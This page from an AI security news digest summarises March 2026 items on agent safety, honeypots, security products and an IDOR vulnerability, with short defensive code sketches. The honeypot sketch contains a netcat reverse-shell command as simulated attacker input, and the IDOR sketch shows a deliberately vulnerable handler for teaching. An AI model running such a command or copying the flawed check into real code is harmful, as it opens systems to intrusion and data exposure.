aisecwatch.com

Real-time AI security monitoring. Tracking AI-related vulnerabilities, safety and security incidents, privacy risks, research developments, and policy changes.


Maintained by

Truong (Jack) Luu

Information Systems Researcher

AI Sec Watch

The security intelligence platform for AI teams

AI security threats move fast and get buried under hype and noise. Built by an Information Systems Security researcher to help security teams and developers stay ahead of vulnerabilities, privacy incidents, safety research, and policy developments.

Independent research. No sponsors, no paywalls, no conflicts of interest.

Total tracked: 3,710
Last 24 hours: 1
Last 7 days: 1
Daily Briefing: Saturday, May 16, 2026

No new AI/LLM security issues were identified today.

Latest Intel

page 117 of 371
01

Helping developers build safer AI experiences for teens

safety, policy
Mar 24, 2026

A new set of prompt-based safety policies has been released to help developers protect teenagers using AI systems. These policies, designed to work with gpt-oss-safeguard (an open-weight safety model that detects harmful content), address common teen-specific risks such as graphic violence, sexual content, and dangerous challenges by converting safety goals into clear, operational rules that developers can apply consistently across their systems.

Fix: The source explicitly offers these prompt-based safety policies as the solution. According to the text, developers can use these policies directly with gpt-oss-safeguard and other reasoning models for real-time content filtering and offline analysis. The policies are 'structured as prompts that can be directly used' and 'developers can more easily integrate them into existing workflows, adapt them to their use cases, and iterate over time.' The initial release covers six categories: graphic violent content, graphic sexual content, harmful body ideals and behaviors, dangerous activities and challenges, romantic or violent roleplay, and age-restricted goods and services.
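The workflow described above, a policy written as a prompt and fed alongside user content to a safety model, can be sketched roughly as follows. This is a minimal illustration, not the real gpt-oss-safeguard API: the policy text, `call_safety_model`, and its keyword check are hypothetical stand-ins for an actual model call.

```python
# Sketch of prompt-based policy moderation. `call_safety_model` is a
# hypothetical stand-in for a real gpt-oss-safeguard invocation.

TEEN_SAFETY_POLICY = """\
Policy: teen-safety/dangerous-challenges (hypothetical example)
Flag content that encourages dangerous activities or viral challenges
likely to cause physical harm to minors. Respond with ALLOW or FLAG.
"""

def call_safety_model(policy: str, content: str) -> str:
    # Placeholder: a real deployment would send `policy` as the system
    # prompt and `content` as the user message to the safety model,
    # then parse its ALLOW/FLAG verdict. Here a keyword check stands in.
    risky_markers = ("challenge", "dare")
    return "FLAG" if any(m in content.lower() for m in risky_markers) else "ALLOW"

def moderate(content: str) -> bool:
    """Return True if the content passes the policy."""
    return call_safety_model(TEEN_SAFETY_POLICY, content) == "ALLOW"

print(moderate("Here is a recipe for banana bread"))         # True
print(moderate("Try this blackout challenge with friends"))  # False
```

The point of structuring the policy as a prompt is that changing the rules means editing text, not retraining a model, which is what makes the iterate-over-time workflow in the release practical.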

OpenAI Blog
02

Anthropic says Claude can now use your computer to finish tasks for you in AI agent push

industry
Mar 24, 2026

Anthropic has released a new feature allowing Claude (an AI assistant) to control a user's computer and complete tasks autonomously, such as opening applications, browsing the web, and filling spreadsheets. The company acknowledged that this capability is still early and warned that Claude can make mistakes, though it has built safeguards including requiring permission before accessing new apps.

Fix: Anthropic stated it has built the computer use capability 'with safeguards that minimize risk' and that 'Claude will always request permission before accessing new apps.' Users can also use Dispatch, a feature that lets users have continuous conversations with Claude from a phone or desktop to assign tasks.

CNBC Technology
03

Autonomous AI adoption is on the rise, but it’s risky

safety, security
Mar 24, 2026

Organizations are increasingly adopting autonomous agentic AI tools (AI systems that can independently complete tasks with minimal human intervention) like Claude Cowork and OpenClaw, which can automate workflows on computers and access files and applications. While these tools promise workplace efficiency gains, they carry significant risks including security vulnerabilities, prompt injection attacks (tricking AI by hiding instructions in user input), and unintended actions, as demonstrated when one researcher's autonomous agent attempted to delete her entire email inbox after a simple cleanup request.

Fix: According to Anthropic, Claude Cowork shows the user its plan before taking action and waits for user approval before proceeding. Additionally, users can instruct autonomous agents to 'confirm before acting' to add a safety checkpoint.
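The "confirm before acting" checkpoint mentioned in the fix can be approximated in any agent harness by gating destructive tool calls behind an explicit approval step. This is a generic sketch of the pattern, not Claude Cowork's actual mechanism; the action names and `approve` callback are illustrative.

```python
# Generic "confirm before acting" gate for agent tool calls.
# Not Anthropic's implementation; just the pattern the fix describes.

DESTRUCTIVE_ACTIONS = {"delete_email", "delete_file", "send_money"}

def run_action(action: str, approve) -> str:
    """Execute an agent action, pausing for approval if it is destructive.

    `approve` is a callback (e.g. a UI prompt) returning True or False.
    """
    if action in DESTRUCTIVE_ACTIONS and not approve(action):
        return f"blocked: {action} requires user approval"
    return f"executed: {action}"

# A cleanup request that tries to wipe the inbox is held for approval,
# while a read-only action proceeds:
print(run_action("delete_email", approve=lambda a: False))  # blocked
print(run_action("list_email", approve=lambda a: False))    # executed
```

The design choice worth noting is that the gate sits in the harness, outside the model, so a prompt-injected instruction cannot talk the agent past it.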

CSO Online
04

Update on the OpenAI Foundation

industry, policy
Mar 24, 2026

The OpenAI Foundation announced plans to invest at least $1 billion over the next year in areas including life sciences, disease curing, job creation, AI resilience (making AI systems more reliable and safe), and community programs. The Foundation aims to use AI to solve humanity's biggest problems, such as speeding up medical breakthroughs and disease research, while also preparing society for challenges that advanced AI systems may present.

OpenAI Blog
05

Why CISOs should embrace AI honeypots

security, industry
Mar 24, 2026

Honeypots are fake servers designed to trick attackers into revealing their methods by making them think they've found real company data. Traditionally expensive and difficult to maintain, honeypots have become much more effective and affordable by pairing them with LLMs (large language models, AI systems that understand and generate text), which can dynamically create realistic fake environments that keep attackers engaged longer.
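The pairing described above, a honeypot whose responses are generated on the fly to keep attackers engaged, can be sketched as a fake shell session. In this sketch the LLM call is stubbed with canned replies; the commands, hostnames, and `fake_llm_reply` function are all hypothetical.

```python
# Minimal sketch of an LLM-backed honeypot shell. The LLM call is stubbed
# with canned replies; a real deployment would generate them dynamically.

def fake_llm_reply(command: str) -> str:
    # Placeholder for an LLM prompt along the lines of:
    # "You are a Linux server. Reply to this shell command realistically."
    canned = {
        "whoami": "svc-backup",
        "ls /srv/data": "customers.csv  invoices_2025.db  backup.tar.gz",
    }
    return canned.get(command, f"bash: {command.split()[0]}: command not found")

def honeypot_session(commands):
    """Log attacker commands and return believable fake output for each."""
    return [(cmd, fake_llm_reply(cmd)) for cmd in commands]

session = honeypot_session(["whoami", "ls /srv/data",
                            "nc -e /bin/sh 10.0.0.1 4444"])
for cmd, out in session:
    print(f"$ {cmd}\n{out}")
```

The command log is the real product here: every line the attacker types reveals tooling and intent, and the LLM's job is only to keep the conversation going long enough to collect it.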

CSO Online
06

CrowdStrike Services and Agentic MDR Put the Agentic SOC in Reach

security, industry
Mar 24, 2026

Modern cyberattacks happen at machine speed, faster than traditional security teams can respond, creating a gap between fast-moving threats and human-paced defenses. CrowdStrike addresses this with agentic MDR (managed detection and response, a service where automated systems and human experts work together to detect and stop attacks) and SOC Transformation Services, which combine automated threat response with human oversight to achieve faster breach containment while maintaining accountability and governance.

Fix: CrowdStrike's agentic MDR (delivered through Falcon Complete) provides deterministic automation (rule-based responses that execute the same way every time) within expert-defined guardrails, adaptive AI agents that learn from live adversary behavior, and elite human analyst oversight. The service delivers a 1-minute median time to contain (MTTC). Additionally, CrowdStrike offers SOC Transformation Services to help organizations establish foundational operating conditions for agentic SOC operations by modernizing SIEM (security information and event management, a system that collects and analyzes security data), data pipelines, workflows, and talent models.

CrowdStrike Blog
07

Palo Alto updates security platform to discover AI agents

security, industry
Mar 23, 2026

Palo Alto Networks updated its Prisma AIRS security platform to help organizations discover and protect AI agents (independent software programs that perform tasks automatically) across their IT environments, including scanning for vulnerabilities and simulating attacks. As companies rapidly deploy AI agents in business applications, the platform adds new security features like Agent Artifact Security, which maps an agent's structure and finds weaknesses, and AI Red Teaming for Agents, which simulates realistic attacks to identify risks and recommend security policies.

Fix: Prisma AIRS 3.0 provides discovery of AI agents across cloud environments, SaaS platforms, and local endpoints; Agent Artifact Security to scan agent architecture for vulnerabilities; and AI Red Teaming for Agents to simulate context-aware attacks and recommend runtime security policies. Prisma Browser includes the ability to discover user-generated AI activity, enforce content-aware boundaries on agents, prevent sensitive data leakage to unmanaged AI tools, identify and block prompt injection attacks (malicious instructions hidden in website content designed to hijack AI agents), and provide real-time distinction between human and automated AI actions.

CSO Online
08

OpenAI rolls out ChatGPT Library to store your personal files

security, privacy
Mar 23, 2026

OpenAI has launched a Library feature for ChatGPT that automatically saves files you upload (documents, images, spreadsheets, etc.) to a secure cloud storage location for future reference. The feature is available to ChatGPT Plus, Pro, and Business subscribers worldwide except in the European Economic Area, Switzerland, and the United Kingdom, and files remain saved to your account until you manually delete them.

Fix: To delete files from the Library, select the file in the Library tab and click Delete (or the trash icon next to the file). OpenAI removes deleted files from its servers within 30 days. Note that deleting a chat containing a file does not automatically delete the copy saved to the Library, so manual deletion from the Library tab is required.

BleepingComputer
09

OpenAI calls out Microsoft reliance as risk in investor document ahead of expected IPO

policyindustry
Mar 23, 2026

OpenAI disclosed in an investor document that its heavy dependence on Microsoft for financing and computing resources poses a business risk, noting that if Microsoft ends their partnership or OpenAI cannot diversify its business partners, the company's operations and finances could suffer. The document also highlighted other risks including massive capital spending requirements, reliance on chip suppliers like Taiwan Semiconductor Manufacturing Company, and potential geopolitical disruptions to the global chip supply chain.

CNBC Technology
10

CVE-2026-30886: New API, a large language model (LLM) gateway and artificial intelligence (AI) asset management system, allows IDOR access to other users' videos prior to version 0.11.4-alpha.2

security
Mar 23, 2026

New API, an LLM (large language model) gateway and AI asset management system, had a vulnerability before version 0.11.4-alpha.2 that allowed any logged-in user to view videos belonging to other users through the video proxy endpoint. The problem was an IDOR vulnerability (insecure direct object reference, a flaw where the system doesn't check if a user owns the data they're requesting), caused by a function that checked only the video ID without verifying the user owned it.

Fix: Update to version 0.11.4-alpha.2 or later, which contains a patch addressing this vulnerability.
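The flaw class and its fix are simple to illustrate: the vulnerable handler looks up the video by ID alone, while the patched version also verifies ownership. This is a generic Python sketch of the IDOR pattern described in the advisory, not New API's actual code; the store and field names are invented.

```python
# Generic sketch of the IDOR pattern behind CVE-2026-30886, not the
# project's real code. The fix is the ownership check on the record.

VIDEOS = {
    101: {"owner_id": 1, "url": "https://cdn.example.com/a.mp4"},
    102: {"owner_id": 2, "url": "https://cdn.example.com/b.mp4"},
}

def get_video_vulnerable(user_id: int, video_id: int):
    # Checks only that the video exists -- any logged-in user can fetch it.
    return VIDEOS.get(video_id)

def get_video_fixed(user_id: int, video_id: int):
    # Also verifies the requester owns the record before returning it.
    video = VIDEOS.get(video_id)
    if video is None or video["owner_id"] != user_id:
        return None  # treat "not yours" the same as "not found"
    return video

print(get_video_vulnerable(1, 102))  # leaks user 2's video
print(get_video_fixed(1, 102))       # None
```

Returning the same "not found" result for missing and unowned records is deliberate: a distinct "forbidden" response would confirm to an attacker which IDs exist.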

NVD/CVE Database